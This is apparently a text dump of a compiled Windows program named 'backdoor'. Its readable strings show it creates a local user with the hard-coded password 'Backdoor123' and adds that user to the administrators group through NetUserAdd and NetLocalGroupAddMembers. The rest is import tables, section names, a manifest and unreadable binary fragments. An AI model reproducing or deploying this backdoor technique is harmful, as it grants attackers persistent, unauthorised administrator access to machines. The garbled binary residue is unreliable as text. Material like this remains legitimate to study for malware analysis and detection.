!This program cannot be run in DOS mode.
(Richl
.text
`.rdata
@.data
.rsrc
@.reloc
=\P@
=DP@
hp&@
h@T@
=,P@
L$$3
5DT@
5@T@
5DT@
h0%@
hP%@
$SVW
@t=f
Y_^[
h89@
Y_^[
h+!@
hX9@
hL1@
h@1@
h<1@
h 1@
Y_^[
hh1@
ht9@
SVW3
ntel
5ineI
5Genu
t#=`
= T@
= T@
= T@
= T@
_^[3
h}!@
>csm
%$T@
h;"@
Y__^[
h(T@
%x0@
%l0@
%h0@
%|0@
%p0@
% 0@
bad allocation
Unknown exception
bad array new length
string too long
User $ with Password Backdoor123 successfully added 
adding $ to admin group now..
something went wrong... error code 
User added to admin group! 
error in struct code: 
RSDS
C:\Users\XuanJian\Desktop\backdoor\Release\backdoor.pdb
GCTL
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.bss
.rsrc$01
.rsrc$02
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?uncaught_exception@std@@YA_NXZ
?_Xlength_error@std@@YAXPBD@Z
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z
MSVCP140.dll
NetLocalGroupAddMembers
NetUserAdd
NETAPI32.dll
__CxxFrameHandler3
__std_exception_destroy
__std_exception_copy
__std_terminate
_CxxThrowException
__current_exception
__current_exception_context
memset
_except_handler4_common
VCRUNTIME140.dll
_invalid_parameter_noinfo_noreturn
_callnewh
malloc
_configure_narrow_argv
_initialize_narrow_environment
_initialize_onexit_table
_register_onexit_function
_crt_atexit
_cexit
_seh_filter_exe
_set_app_type
__setusermatherr
_get_initial_narrow_environment
_initterm
_initterm_e
exit
_exit
_set_fmode
__p___argc
__p___argv
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
terminate
free
_controlfp_s
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
KERNEL32.dll
memcpy
memmove
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
0"0(0/040C0H0R0b0h0o0t0
0%1,1M1S1o1
2%2+202{2
3$353@3F3L3v3
3#5F5R5
7U7Z7x7
9!9'9<9Q9X9^9p9z9
:):n:
:M;x;
=$=*=0=6===D=K=R=Y=`=g=o=w=
>1>;>
>6?@?I?R?g?p?
121r1x1
1V2[2
3?3E3k3t3z3
4!4'4-43494?4E4K4Q4W4]4c4i4o4u4{4
4#5)5D5d5
6O6Y6c6j6r6|6
1$1(1,1014181D1H1`1d1h1l1p1t1x1|1
4$4<4L4P4T4X4\4d4h4p4
5 5x8
9$949L9P9l9p9x9
`0x0
